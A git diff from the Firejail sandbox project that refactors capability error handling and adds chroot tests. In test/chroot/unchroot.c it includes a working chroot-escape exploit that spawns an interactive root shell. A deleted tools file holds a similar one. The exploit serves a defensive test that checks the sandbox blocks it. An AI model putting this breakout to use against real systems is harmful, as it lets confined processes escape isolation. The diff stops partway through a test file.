30 files changed, 578 insertions, 306 deletions

diff --git a/Makefile.in b/Makefile.in
index d1f03c788..8251f9882 100644
--- a/Makefile.in
+++ b/Makefile.in
@@ -249,6 +249,10 @@ test: test-profiles test-fcopy test-fs test-utils  test-environment test-apps te
 # with them you will need to restart your computer.
 ##########################################
 
+# requires root access
+test-chroot:
+        cd test/chroot; ./chroot.sh | grep testing
+
 # Huge appimage files, not included in "make dist" archive
 test-appimage:
         cd test/appimage; ./appimage.sh | grep TESTING
@@ -268,6 +272,6 @@ test-overlay:
 
 # For testing hidepid system, the command to set it up is "mount -o remount,rw,hidepid=2 /proc"
 
-test-all: test-root test-network test-appimage test-overlay test-fcopy test
+test-all: test-root test-chroot test-network test-appimage test-overlay
         echo "TEST COMPLETE"
         
\ No newline at end of file
diff --git a/gcov.sh b/gcov.sh
index 900b7ca41..c5c385dd3 100755
--- a/gcov.sh
+++ b/gcov.sh
@@ -13,9 +13,9 @@ gcov_init() {
 }
 
 generate() {
-        lcov --capture -d src/firejail -d src/firemon -d  src/fcopy -d src/fseccomp -d src/fnet -d src/ftee -d src/lib -d src/firecfg --output-file gcov-file
+        lcov -q --capture -d src/firejail -d src/firemon -d  src/fcopy -d src/fseccomp -d src/fnet -d src/ftee -d src/lib -d src/firecfg --output-file gcov-file
         rm -fr gcov-dir
-        genhtml gcov-file --output-directory gcov-dir
+        genhtml -q gcov-file --output-directory gcov-dir
 }
 
 gcov_init
@@ -29,6 +29,10 @@ make test-root
 generate
 sleep 2
 
+make test-chroot
+generate
+sleep 2
+
 make test-network
 generate
 sleep 2
diff --git a/src/firejail/caps.c b/src/firejail/caps.c
index ba811cada..6cfa36629 100644
--- a/src/firejail/caps.c
+++ b/src/firejail/caps.c
@@ -181,12 +181,10 @@ static int caps_find_name(const char *name) {
 }
 
 // return 1 if error, 0 if OK
-int caps_check_list(const char *clist, void (*callback)(int)) {
+void caps_check_list(const char *clist, void (*callback)(int)) {
         // don't allow empty lists
-        if (clist == NULL || *clist == '\0') {
-                fprintf(stderr, "Error: empty capabilities lists are not allowed\n");
-                return -1;
-        }
+        if (clist == NULL || *clist == '\0')
+                goto errexit;
 
         // work on a copy of the string
         char *str = strdup(clist);
@@ -201,11 +199,8 @@ int caps_check_list(const char *clist, void (*callback)(int)) {
                 else if (*ptr == ',') {
                         *ptr = '\0';
                         int nr = caps_find_name(start);
-                        if (nr == -1) {
-                                fprintf(stderr, "Error: capability %s not found\n", start);
-                                free(str);
-                                return -1;
-                        }
+                        if (nr == -1)
+                                goto errexit;
                         else if (callback != NULL)
                                 callback(nr);
                                 
@@ -215,17 +210,18 @@ int caps_check_list(const char *clist, void (*callback)(int)) {
         }
         if (*start != '\0') {
                 int nr = caps_find_name(start);
-                if (nr == -1) {
-                        fprintf(stderr, "Error: capability %s not found\n", start);
-                        free(str);      
-                        return -1;
-                }
+                if (nr == -1) 
+                        goto errexit;
                 else if (callback != NULL)
                         callback(nr);
         }
 
         free(str);      
-        return 0;
+        return;
+
+errexit:
+        fprintf(stderr, "Error: capability \"%s\" not found\n", start);
+        exit(1);        
 }
 
 void caps_print(void) {
@@ -256,49 +252,53 @@ void caps_print(void) {
 // enabled by default
 int caps_default_filter(void) {
         // drop capabilities
-        if (prctl(PR_CAPBSET_DROP, CAP_SYS_MODULE, 0, 0, 0) && arg_debug)
-                fprintf(stderr, "Warning: cannot drop CAP_SYS_MODULE");
+        if (prctl(PR_CAPBSET_DROP, CAP_SYS_MODULE, 0, 0, 0))
+                goto errexit;
         else if (arg_debug)
                 printf("Drop CAP_SYS_MODULE\n");
 
-        if (prctl(PR_CAPBSET_DROP, CAP_SYS_RAWIO, 0, 0, 0) && arg_debug)
-                fprintf(stderr, "Warning: cannot drop CAP_SYS_RAWIO");
+        if (prctl(PR_CAPBSET_DROP, CAP_SYS_RAWIO, 0, 0, 0))
+                goto errexit;
         else if (arg_debug)
                 printf("Drop CAP_SYS_RAWIO\n");
 
-        if (prctl(PR_CAPBSET_DROP, CAP_SYS_BOOT, 0, 0, 0) && arg_debug)
-                fprintf(stderr, "Warning: cannot drop CAP_SYS_BOOT");
+        if (prctl(PR_CAPBSET_DROP, CAP_SYS_BOOT, 0, 0, 0))
+                goto errexit;
         else if (arg_debug)
                 printf("Drop CAP_SYS_BOOT\n");
 
-        if (prctl(PR_CAPBSET_DROP, CAP_SYS_NICE, 0, 0, 0) && arg_debug)
-                fprintf(stderr, "Warning: cannot drop CAP_SYS_NICE");
+        if (prctl(PR_CAPBSET_DROP, CAP_SYS_NICE, 0, 0, 0))
+                goto errexit;
         else if (arg_debug)
                 printf("Drop CAP_SYS_NICE\n");
 
-        if (prctl(PR_CAPBSET_DROP, CAP_SYS_TTY_CONFIG, 0, 0, 0) && arg_debug)
-                fprintf(stderr, "Warning: cannot drop CAP_SYS_TTY_CONFIG");
+        if (prctl(PR_CAPBSET_DROP, CAP_SYS_TTY_CONFIG, 0, 0, 0))
+                goto errexit;
         else if (arg_debug)
                 printf("Drop CAP_SYS_TTY_CONFIG\n");
 
 #ifdef CAP_SYSLOG
-        if (prctl(PR_CAPBSET_DROP, CAP_SYSLOG, 0, 0, 0) && arg_debug)
-                fprintf(stderr, "Warning: cannot drop CAP_SYSLOG");
+        if (prctl(PR_CAPBSET_DROP, CAP_SYSLOG, 0, 0, 0))
+                goto errexit;
         else if (arg_debug)
                 printf("Drop CAP_SYSLOG\n");
 #endif
 
-        if (prctl(PR_CAPBSET_DROP, CAP_MKNOD, 0, 0, 0) && arg_debug)
-                fprintf(stderr, "Warning: cannot drop CAP_MKNOD");
+        if (prctl(PR_CAPBSET_DROP, CAP_MKNOD, 0, 0, 0))
+                goto errexit;
         else if (arg_debug)
                 printf("Drop CAP_MKNOD\n");
 
-        if (prctl(PR_CAPBSET_DROP, CAP_SYS_ADMIN, 0, 0, 0) && arg_debug)
-                fprintf(stderr, "Warning: cannot drop CAP_SYS_ADMIN");
+        if (prctl(PR_CAPBSET_DROP, CAP_SYS_ADMIN, 0, 0, 0))
+                goto errexit;
         else if (arg_debug)
                 printf("Drop CAP_SYS_ADMIN\n");
 
         return 0;
+
+errexit:
+        fprintf(stderr, "Error: cannot drop capabilities\n");
+        exit(1);        
 }
 
 void caps_drop_all(void) {
@@ -359,19 +359,14 @@ static uint64_t extract_caps(int pid) {
         EUID_ASSERT();
         
         char *file;
-        if (asprintf(&file, "/proc/%d/status", pid) == -1) {
+        if (asprintf(&file, "/proc/%d/status", pid) == -1)
                 errExit("asprintf");
-                exit(1);
-        }
 
         EUID_ROOT();    // grsecurity
         FILE *fp = fopen(file, "r");
         EUID_USER();    // grsecurity
-        if (!fp) {
-                printf("Error: cannot open %s\n", file);
-                free(file);
-                exit(1);
-        }
+        if (!fp)
+                goto errexit;
         
         char buf[MAXBUF];
         while (fgets(buf, MAXBUF, fp)) {
@@ -385,6 +380,8 @@ static uint64_t extract_caps(int pid) {
                 }
         }
         fclose(fp);
+
+errexit:        
         free(file);
         fprintf(stderr, "Error: cannot read caps configuration\n");
         exit(1);
diff --git a/src/firejail/firejail.h b/src/firejail/firejail.h
index 2e031ce04..4ae3cfd9f 100644
--- a/src/firejail/firejail.h
+++ b/src/firejail/firejail.h
@@ -508,7 +508,7 @@ int caps_default_filter(void);
 void caps_print(void);
 void caps_drop_all(void);
 void caps_set(uint64_t caps);
-int caps_check_list(const char *clist, void (*callback)(int));
+void caps_check_list(const char *clist, void (*callback)(int));
 void caps_drop_list(const char *clist);
 void caps_keep_list(const char *clist);
 void caps_print_filter(pid_t pid);
diff --git a/src/firejail/fs.c b/src/firejail/fs.c
index 5774ebf6a..8c776bad5 100644
--- a/src/firejail/fs.c
+++ b/src/firejail/fs.c
@@ -1042,6 +1042,9 @@ void fs_chroot(const char *rootdir) {
         if (chroot(rootdir) < 0)
                 errExit("chroot");
 
+        // create all other /run/firejail files and directories
+        preproc_build_firejail_dir();
+
         if (checkcfg(CFG_CHROOT_DESKTOP)) {
                 // update /var directory in order to support multiple sandboxes running on the same root directory
 //              if (!arg_private_dev)
diff --git a/src/firejail/main.c b/src/firejail/main.c
index ff7b762cd..111a1d751 100644
--- a/src/firejail/main.c
+++ b/src/firejail/main.c
@@ -1186,8 +1186,7 @@ int main(int argc, char **argv) {
                         if (!arg_caps_list)
                                 errExit("strdup");
                         // verify caps list and exit if problems
-                        if (caps_check_list(arg_caps_list, NULL))
-                                return 1;
+                        caps_check_list(arg_caps_list, NULL);
                 }
                 else if (strncmp(argv[i], "--caps.keep=", 12) == 0) {
                         arg_caps_keep = 1;
@@ -1195,8 +1194,7 @@ int main(int argc, char **argv) {
                         if (!arg_caps_list)
                                 errExit("strdup");
                         // verify caps list and exit if problems
-                        if (caps_check_list(arg_caps_list, NULL))
-                                return 1;
+                        caps_check_list(arg_caps_list, NULL);
                 }
 
 
diff --git a/src/firejail/profile.c b/src/firejail/profile.c
index 688fa9609..abb8bd9b6 100644
--- a/src/firejail/profile.c
+++ b/src/firejail/profile.c
@@ -570,8 +570,7 @@ int profile_check_line(char *ptr, int lineno, const char *fname) {
                 if (!arg_caps_list)
                         errExit("strdup");
                 // verify caps list and exit if problems
-                if (caps_check_list(arg_caps_list, NULL))
-                        exit(1);
+                caps_check_list(arg_caps_list, NULL);
                 return 0;
         }
         
@@ -582,8 +581,7 @@ int profile_check_line(char *ptr, int lineno, const char *fname) {
                 if (!arg_caps_list)
                         errExit("strdup");
                 // verify caps list and exit if problems
-                if (caps_check_list(arg_caps_list, NULL))
-                        exit(1);
+                caps_check_list(arg_caps_list, NULL);
                 return 0;
         }
 
diff --git a/src/lib/common.c b/src/lib/common.c
index 2f2340963..add4ff087 100644
--- a/src/lib/common.c
+++ b/src/lib/common.c
@@ -39,22 +39,23 @@ int join_namespace(pid_t pid, char *type) {
                 errExit("asprintf");
         
         int fd = open(path, O_RDONLY);
-        if (fd < 0) {
-                free(path);
-                fprintf(stderr, "Error: cannot open /proc/%u/ns/%s.\n", pid, type);
-                return -1;
-        }
+        if (fd < 0)
+                goto errout;
 
         if (syscall(__NR_setns, fd, 0) < 0) {
-                free(path);
-                fprintf(stderr, "Error: cannot join namespace %s.\n", type);
                 close(fd);
-                return -1;
+                goto errout;
         }
 
         close(fd);
         free(path);
         return 0;
+
+errout:
+        free(path);
+        fprintf(stderr, "Error: cannot join namespace %s\\n", type);
+        return -1;
+        
 }
 
 // return 1 if error
@@ -187,8 +188,6 @@ char *pid_proc_cmdline(const pid_t pid) {
         for (i = 0; i < len; i++) {
                 if (buffer[i] == '\0')
                         buffer[i] = ' ';
-//              if (buffer[i] >= 0x80) // execv in progress!!!
-//                      return NULL;
         }
 
         // return a malloc copy of the command line
diff --git a/src/lib/libnetlink.c b/src/lib/libnetlink.c
index 836cf417d..417ef2c5f 100644
--- a/src/lib/libnetlink.c
+++ b/src/lib/libnetlink.c
@@ -105,6 +105,7 @@ int rtnl_open(struct rtnl_handle *rth, unsigned subscriptions)
         return rtnl_open_byproto(rth, subscriptions, NETLINK_ROUTE);
 }
 
+#if 0
 int rtnl_wilddump_request(struct rtnl_handle *rth, int family, int type)
 {
         return rtnl_wilddump_req_filter(rth, family, type, RTEXT_FILTER_VF);
@@ -303,6 +304,7 @@ int rtnl_dump_filter(struct rtnl_handle *rth,
 
         return rtnl_dump_filter_l(rth, a);
 }
+#endif
 
 int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n, pid_t peer,
               unsigned groups, struct nlmsghdr *answer)
@@ -422,6 +424,7 @@ int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n, pid_t peer,
         }
 }
 
+#if 0
 int rtnl_listen(struct rtnl_handle *rtnl,
                 rtnl_filter_t handler,
                 void *jarg)
@@ -580,7 +583,7 @@ int addattrstrz(struct nlmsghdr *n, int maxlen, int type, const char *str)
 {
         return addattr_l(n, maxlen, type, str, strlen(str)+1);
 }
-
+#endif
 
 
 int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
@@ -632,46 +635,8 @@ printf("\tdata length: %d\n", alen);
         return 0;
 }
 
-#if 0
-int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
-              int alen)
-{
-printf("%s: adding type %d, length %d ", __FUNCTION__, type, alen);
-if (type == IFLA_INFO_KIND) {
-if (alen)
-        printf("(IFLA_INFO_KIND %s)\n", (char *)data);  
-else
-printf("(VETH_INFO_PEER)\n");
-}
-else if (type == IFLA_IFNAME) {
-printf("(IFLA_IFNAME %s)\n", (char *) data);
-}
-else if (type == IFLA_NET_NS_PID) {
-printf("(IFLA_NET_NS_PID %u)\n", *((unsigned *) data));
-}
-else if (type == IFLA_LINKINFO)
-printf("(IFLA_LINKINFO)\n");
-else if (type == IFLA_INFO_DATA)
-printf("(IFLA_INFO_DATA)\n");
-else
-        printf("\n");
-
-        int len = RTA_LENGTH(alen);
-        struct rtattr *rta;
-
-        if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
-                fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n",maxlen);
-                return -1;
-        }
-        rta = NLMSG_TAIL(n);
-        rta->rta_type = type;
-        rta->rta_len = len;
-        memcpy(RTA_DATA(rta), data, alen);
-        n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
-        return 0;
-}
-#endif
 
+#if 0
 int addraw_l(struct nlmsghdr *n, int maxlen, const void *data, int len)
 {
         if ((int)(NLMSG_ALIGN(n->nlmsg_len) + NLMSG_ALIGN(len)) > maxlen) {
@@ -802,3 +767,4 @@ int __parse_rtattr_nested_compat(struct rtattr *tb[], int max, struct rtattr *rt
         memset(tb, 0, sizeof(struct rtattr *) * (max + 1));
         return 0;
 }
+#endif
diff --git a/src/lib/pid.c b/src/lib/pid.c
index ed583c51d..42687274e 100644
--- a/src/lib/pid.c
+++ b/src/lib/pid.c
@@ -34,10 +34,9 @@ int max_pids=32769;
 void pid_getmem(unsigned pid, unsigned *rss, unsigned *shared) {
         // open stat file
         char *file;
-        if (asprintf(&file, "/proc/%u/statm", pid) == -1) {
-                perror("asprintf");
-                exit(1);
-        }
+        if (asprintf(&file, "/proc/%u/statm", pid) == -1)
+                errExit("asprintf");
+                
         FILE *fp = fopen(file, "r");
         if (!fp) {
                 free(file);
@@ -59,10 +58,9 @@ void pid_getmem(unsigned pid, unsigned *rss, unsigned *shared) {
 void pid_get_cpu_time(unsigned pid, unsigned *utime, unsigned *stime) {
         // open stat file
         char *file;
-        if (asprintf(&file, "/proc/%u/stat", pid) == -1) {
-                perror("asprintf");
-                exit(1);
-        }
+        if (asprintf(&file, "/proc/%u/stat", pid) == -1)
+                errExit("asprintf");
+
         FILE *fp = fopen(file, "r");
         if (!fp) {
                 free(file);
@@ -93,10 +91,9 @@ myexit:
 unsigned long long pid_get_start_time(unsigned pid) {
         // open stat file
         char *file;
-        if (asprintf(&file, "/proc/%u/stat", pid) == -1) {
-                perror("asprintf");
-                exit(1);
-        }
+        if (asprintf(&file, "/proc/%u/stat", pid) == -1)
+                errExit("asprintf");
+
         FILE *fp = fopen(file, "r");
         if (!fp) {
                 free(file);
@@ -138,10 +135,8 @@ uid_t pid_get_uid(pid_t pid) {
 
         // open status file
         char *file;
-        if (asprintf(&file, "/proc/%u/status", pid) == -1) {
-                perror("asprintf");
-                exit(1);
-        }
+        if (asprintf(&file, "/proc/%u/status", pid) == -1)
+                errExit("asprintf");
 
         FILE *fp = fopen(file, "r");
         if (!fp) {
@@ -316,10 +311,9 @@ void pid_read(pid_t mon_pid) {
                         
                 // open stat file
                 char *file;
-                if (asprintf(&file, "/proc/%u/status", pid) == -1) {
-                        perror("asprintf");
-                        exit(1);
-                }
+                if (asprintf(&file, "/proc/%u/status", pid) == -1)
+                        errExit("asprintf");
+
                 FILE *fp = fopen(file, "r");
                 if (!fp) {
                         free(file);
diff --git a/src/tools/unchroot b/src/tools/unchroot
deleted file mode 100755
index d32ce2682..000000000
--- a/src/tools/unchroot
+++ /dev/null
diff --git a/src/tools/unchroot.c b/src/tools/unchroot.c
deleted file mode 100644
index 21731296e..000000000
--- a/src/tools/unchroot.c
+++ /dev/null
@@ -1,125 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-#include <errno.h>
-#include <fcntl.h>
-#include <string.h>
-#include <unistd.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-
-/* 
- ** You should set NEED_FCHDIR to 1 if the chroot() on your
- ** system changes the working directory of the calling
- ** process to the same directory as the process was chroot()ed
- ** to.
- **
- ** It is known that you do not need to set this value if you
- ** running on Solaris 2.7 and below.
- **
- */
-#define NEED_FCHDIR 0
-
-#define TEMP_DIR "waterbuffalo"
-
-/* Break out of a chroot() environment in C */
-
-int main() {
-        int x;                                    /* Used to move up a directory tree */
-        int done=0;                               /* Are we done yet ? */
-#ifdef NEED_FCHDIR
-        int dir_fd;                               /* File descriptor to directory */
-#endif
-        struct stat sbuf;                         /* The stat() buffer */
-
-        /* 
-         ** First we create the temporary directory if it doesn't exist
-         */
-        if (stat(TEMP_DIR,&sbuf)<0) {
-                if (errno==ENOENT) {
-                        if (mkdir(TEMP_DIR,0755)<0) {
-                                fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR,
-                                        strerror(errno));
-                                exit(1);
-                        }
-                }
-                else {
-                        fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR,
-                                strerror(errno));
-                        exit(1);
-                }
-        }
-        else if (!S_ISDIR(sbuf.st_mode)) {
-                fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR);
-                exit(1);
-        }
-
-#ifdef NEED_FCHDIR
-        /* 
-         ** Now we open the current working directory
-         **
-         ** Note: Only required if chroot() changes the calling program's
-         **       working directory to the directory given to chroot().
-         **
-         */
-        if ((dir_fd=open(".",O_RDONLY))<0) {
-                fprintf(stderr,"Failed to open \".\" for reading - %s\n",
-                        strerror(errno));
-                exit(1);
-        }
-#endif
-
-        /* 
-         ** Next we chroot() to the temporary directory
-         */
-        if (chroot(TEMP_DIR)<0) {
-                fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR,
-                        strerror(errno));
-                exit(1);
-        }
-
-#ifdef NEED_FCHDIR
-        /* 
-         ** Partially break out of the chroot by doing an fchdir()
-         **
-         ** This only partially breaks out of the chroot() since whilst
-         ** our current working directory is outside of the chroot() jail,
-         ** our root directory is still within it. Thus anything which refers
-         ** to "/" will refer to files under the chroot() point.
-         **
-         ** Note: Only required if chroot() changes the calling program's
-         **       working directory to the directory given to chroot().
-         **
-         */
-        if (fchdir(dir_fd)<0) {
-                fprintf(stderr,"Failed to fchdir - %s\n",
-                        strerror(errno));
-                exit(1);
-        }
-        close(dir_fd);
-#endif
-
-        /* 
-         ** Completely break out of the chroot by recursing up the directory
-         ** tree and doing a chroot to the current working directory (which will
-         ** be the real "/" at that point). We just do a chdir("..") lots of
-         ** times (1024 times for luck :). If we hit the real root directory before
-         ** we have finished the loop below it doesn't matter as .. in the root
-         ** directory is the same as . in the root.
-         **
-         ** We do the final break out by doing a chroot(".") which sets the root
-         ** directory to the current working directory - at this point the real
-         ** root directory.
-         */
-        for(x=0;x<1024;x++) {
-                chdir("..");
-        }
-        chroot(".");
-
-        /* 
-         ** We're finally out - so exec a shell in interactive mode
-         */
-        if (execl("/bin/sh","-i",NULL)<0) {
-                fprintf(stderr,"Failed to exec - %s\n",strerror(errno));
-                exit(1);
-        }
-}
diff --git a/test/chroot/chroot-resolvconf.exp b/test/chroot/chroot-resolvconf.exp
deleted file mode 100755
index 2d0da2fb0..000000000
--- a/test/chroot/chroot-resolvconf.exp
+++ /dev/null
@@ -1,14 +0,0 @@
-#!/usr/bin/expect -f
-
-set timeout 10
-spawn $env(SHELL)
-match_max 100000
-
-send -- "firejail --chroot=/tmp/chroot /bin/bash\r"
-expect {
-        timeout {puts "TESTING ERROR 0\n";exit}
-        "invalid /tmp/chroot/etc/resolv.conf file"
-}
-
-puts "\nall done\n"
-
diff --git a/test/chroot/chroot.sh b/test/chroot/chroot.sh
new file mode 100755
index 000000000..34bff2a67
--- /dev/null
+++ b/test/chroot/chroot.sh
@@ -0,0 +1,21 @@
+#!/bin/bash
+# This file is part of Firejail project
+# Copyright (C) 2014-2016 Firejail Authors
+# License GPL v2
+
+export MALLOC_CHECK_=3
+export MALLOC_PERTURB_=$(($RANDOM % 255 + 1))
+
+rm -f unchroot
+gcc -o unchroot unchroot.c
+sudo ./configure
+
+echo "TESTING: chroot (test/chroot/fs_chroot.exp)"
+./fs_chroot.exp
+
+echo "TESTING: unchroot as root (test/chroot/unchroot-as-root.exp)"
+sudo ./unchroot-as-root.exp
+
+
+
+rm -f unchroot
diff --git a/test/chroot/configure b/test/chroot/configure
new file mode 100755
index 000000000..ba8238803
--- /dev/null
+++ b/test/chroot/configure
@@ -0,0 +1,46 @@
+#!/bin/bash
+
+# build a very small chroot
+ROOTDIR="/tmp/chroot"                   # default chroot directory
+DEFAULT_FILES="/bin/bash /bin/sh "      # basic chroot files
+DEFAULT_FILES+="/etc/passwd /etc/nsswitch.conf /etc/group "
+DEFAULT_FILES+=`find /lib -name libnss*`        # files required by glibc
+DEFAULT_FILES+=" /bin/cp /bin/ls /bin/cat /bin/ps /bin/netstat /bin/ping /sbin/ifconfig /usr/bin/touch /bin/ip /bin/hostname /bin/grep /usr/bin/dig /usr/bin/openssl /usr/bin/id /usr/bin/getent /usr/bin/whoami /usr/bin/wc /usr/bin/wget /bin/umount"
+
+rm -fr $ROOTDIR
+mkdir -p $ROOTDIR/{root,bin,lib,lib64,usr,home,etc,dev/shm,tmp,var/run,var/tmp,var/lock,var/log,proc}
+chmod 777 $ROOTDIR/tmp
+mkdir -p $ROOTDIR/etc/firejail
+mkdir -p $ROOTDIR/home/netblue/.config/firejail
+chown netblue:netblue $ROOTDIR/home/netblue
+chown netblue:netblue $ROOTDIR/home/netblue/.config
+cp /home/netblue/.Xauthority $ROOTDIR/home/netblue/.
+cp -a /etc/skel $ROOTDIR/etc/.
+mkdir $ROOTDIR/home/someotheruser
+mkdir $ROOTDIR/boot
+mkdir $ROOTDIR/selinux
+cp /etc/passwd $ROOTDIR/etc/.
+cp /etc/group $ROOTDIR/etc/.
+cp /etc/hosts $ROOTDIR/etc/.
+cp /etc/hostname $ROOTDIR/etc/.
+mkdir -p $ROOTDIR/usr/lib/x86_64-linux-gnu
+cp -a /usr/lib/x86_64-linux-gnu/openssl-1.0.0 $ROOTDIR/usr/lib/x86_64-linux-gnu/.
+cp -a /usr/lib/ssl $ROOTDIR/usr/lib/.
+touch $ROOTDIR/var/log/syslog
+touch $ROOTDIR/var/tmp/somefile
+SORTED=`for FILE in $* $DEFAULT_FILES; do echo " $FILE "; ldd $FILE | grep -v dynamic | cut -d " " -f 3; done | sort -u`
+for FILE in $SORTED
+do
+        cp --parents $FILE $ROOTDIR
+done
+cp --parents /lib64/ld-linux-x86-64.so.2 $ROOTDIR
+cp --parents /lib/ld-linux.so.2 $ROOTDIR
+cp unchroot $ROOTDIR/.
+touch $ROOTDIR/this-is-my-chroot
+
+cd $ROOTDIR; find .
+mkdir -p usr/lib/firejail/
+cp /usr/lib/firejail/libtrace.so usr/lib/firejail/.
+
+
+echo "To enter the chroot directory run: firejail --chroot=$ROOTDIR"
diff --git a/test/chroot/fs_chroot.exp b/test/chroot/fs_chroot.exp
index aeb5669e1..295ff8ff9 100755
--- a/test/chroot/fs_chroot.exp
+++ b/test/chroot/fs_chroot.exp
@@ -20,19 +20,14 @@ expect {
 sleep 1
 send -- "bash\r"
 sleep 1
-send -- "ls /; pwd\r"
+send -- "ls /\r"
 expect {
         timeout {puts "TESTING ERROR 0.2\n";exit}
         "this-is-my-chroot"
 }
-expect {
-        timeout {puts "TESTING ERROR 0.3\n";exit}
-        "home"
-}
-
+after 100
 
-
-send -- "ps aux; pwd\r"
+send -- "ps aux\r"
 expect {
         timeout {puts "TESTING ERROR 1\n";exit}
         "/bin/bash"
@@ -45,23 +40,14 @@ expect {
         timeout {puts "TESTING ERROR 3\n";exit}
         "ps aux"
 }
-expect {
-        timeout {puts "TESTING ERROR 4\n";exit}
-        "home"
-}
-sleep 1
+after 100
 
-
-send -- "ps aux |wc -l; pwd\r"
+send -- "ps aux | wc -l; pwd\r"
 expect {
         timeout {puts "TESTING ERROR 5\n";exit}
         "6"
 }
-expect {
-        timeout {puts "TESTING ERROR 6\n";exit}
-        "home"
-}
-sleep 1
+after 100
 
 
 puts "all done\n"
diff --git a/test/chroot/unchroot-as-root.exp b/test/chroot/unchroot-as-root.exp
new file mode 100755
index 000000000..9f8a1d784
--- /dev/null
+++ b/test/chroot/unchroot-as-root.exp
@@ -0,0 +1,27 @@
+#!/usr/bin/expect -f
+
+set timeout 10
+spawn $env(SHELL)
+match_max 100000
+
+send -- "firejail  --chroot=/tmp/chroot\r"
+expect {
+        timeout {puts "TESTING ERROR 0\n";exit}
+        "Error: --chroot option is not available on Grsecurity systems" {puts "\nall done\n"; exit}
+        "Child process initialized" {puts "chroot available\n"};
+}
+sleep 1
+
+send -- "cd /\r"
+after 100
+
+
+send -- "./unchroot\r"
+expect {
+        timeout {puts "TESTING ERROR 1\n";exit}
+        "Bad system call"
+}
+after 100
+
+puts "all done\n"
+
diff --git a/test/chroot/unchroot.c b/test/chroot/unchroot.c
new file mode 100644
index 000000000..1982e07f3
--- /dev/null
+++ b/test/chroot/unchroot.c
@@ -0,0 +1,40 @@
+// simple unchroot example from http://linux-vserver.org/Secure_chroot_Barrier
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+
+void die(char *msg) {
+        perror(msg);
+        exit(1);
+}
+
+int main(int argc, char *argv[])
+{
+        int i;
+        
+        if (chdir("/") != 0)
+                die("chdir(/)");
+        
+        if (mkdir("baz", 0777) != 0)
+                ; //die("mkdir(baz)");
+        
+        if (chroot("baz") != 0)
+                die("chroot(baz)");
+        
+        for (i=0; i<50; i++) {
+                if (chdir("..") != 0)
+                        die("chdir(..)");
+        }
+        
+        if (chroot(".") != 0)
+                die("chroot(.)");
+        
+        printf("Exploit seems to work. =)\n");
+        
+        execl("/bin/bash", "bash", "-i", (char *)0);
+        die("exec bash");
+        
+        exit(0);
+}
diff --git a/test/environment/dns.exp b/test/environment/dns.exp
index a6a7171eb..40403aade 100755
--- a/test/environment/dns.exp
+++ b/test/environment/dns.exp
@@ -4,6 +4,31 @@ set timeout 30
 spawn $env(SHELL)
 match_max 100000
 
+send -- "firejail --dns=8.8.4.4 --dns=8.8.8.8 --dns=4.2.2.1\r"
+expect {
+        timeout {puts "TESTING ERROR 2.1\n";exit}
+        "Child process initialized"
+}
+sleep 1
+
+send -- "cat /etc/resolv.conf\r"
+expect {
+        timeout {puts "TESTING ERROR 2.2\n";exit}
+        "nameserver 8.8.4.4"
+}
+expect {
+        timeout {puts "TESTING ERROR 2.3\n";exit}
+        "nameserver 8.8.8.8"
+}
+expect {
+        timeout {puts "TESTING ERROR 2.4\n";exit}
+        "nameserver 4.2.2.1"
+}
+after 100
+send -- "exit\r"
+after 100
+
+
 # no chroot
 send -- "firejail --trace --dns=208.67.222.222 wget -q debian.org\r"
 expect {
@@ -27,28 +52,6 @@ after 100
 send -- "rm index.html\r"
 after 100
 send -- "exit\r"
-sleep 1
-
-send -- "firejail --dns=8.8.4.4 --dns=8.8.8.8 --dns=4.2.2.1\r"
-expect {
-        timeout {puts "TESTING ERROR 2.1\n";exit}
-        "Child process initialized"
-}
-sleep 1
-
-send -- "cat /etc/resolv.conf\r"
-expect {
-        timeout {puts "TESTING ERROR 2.2\n";exit}
-        "nameserver 8.8.4.4"
-}
-expect {
-        timeout {puts "TESTING ERROR 2.3\n";exit}
-        "nameserver 8.8.8.8"
-}
-expect {
-        timeout {puts "TESTING ERROR 2.4\n";exit}
-        "nameserver 4.2.2.1"
-}
 after 100
 
 puts "\nall done\n"
diff --git a/test/filters/caps-print.exp b/test/filters/caps-print.exp
new file mode 100755
index 000000000..d9d662239
--- /dev/null
+++ b/test/filters/caps-print.exp
@@ -0,0 +1,103 @@
+#!/usr/bin/expect -f
+# This file is part of Firejail project
+# Copyright (C) 2014-2016 Firejail Authors
+# License GPL v2
+
+set timeout 10
+spawn $env(SHELL)
+match_max 100000
+
+send -- "firejail --name=test --noprofile --caps --debug\r"
+expect {
+        timeout {puts "TESTING ERROR 0\n";exit}
+        "Drop CAP_SYS_MODULE"
+}
+expect {
+        timeout {puts "TESTING ERROR 1\n";exit}
+        "Drop CAP_SYS_RAWIO"
+}
+expect {
+        timeout {puts "TESTING ERROR 2\n";exit}
+        "Drop CAP_SYS_BOOT"
+}
+expect {
+        timeout {puts "TESTING ERROR 3\n";exit}
+        "Drop CAP_SYS_NICE"
+}
+expect {
+        timeout {puts "TESTING ERROR 4\n";exit}
+        "Drop CAP_SYS_TTY_CONFIG"
+}
+expect {
+        timeout {puts "TESTING ERROR 5\n";exit}
+        "Drop CAP_SYSLOG"
+}
+expect {
+        timeout {puts "TESTING ERROR 6\n";exit}
+        "Drop CAP_MKNOD"
+}
+expect {
+        timeout {puts "TESTING ERROR 7\n";exit}
+        "Drop CAP_SYS_ADMIN"
+}
+expect {
+        timeout {puts "TESTING ERROR 8\n";exit}
+        "Child process initialized"
+}
+sleep 1
+
+spawn $env(SHELL)
+send -- "firejail --caps.print=test\r"
+expect {
+        timeout {puts "TESTING ERROR 9\n";exit}
+        "chown               - enabled"
+}
+expect {
+        timeout {puts "TESTING ERROR 10\n";exit}
+        "setgid              - enabled"
+}
+expect {
+        timeout {puts "TESTING ERROR 11\n";exit}
+        "setuid              - enabled"
+}
+expect {
+        timeout {puts "TESTING ERROR 12\n";exit}
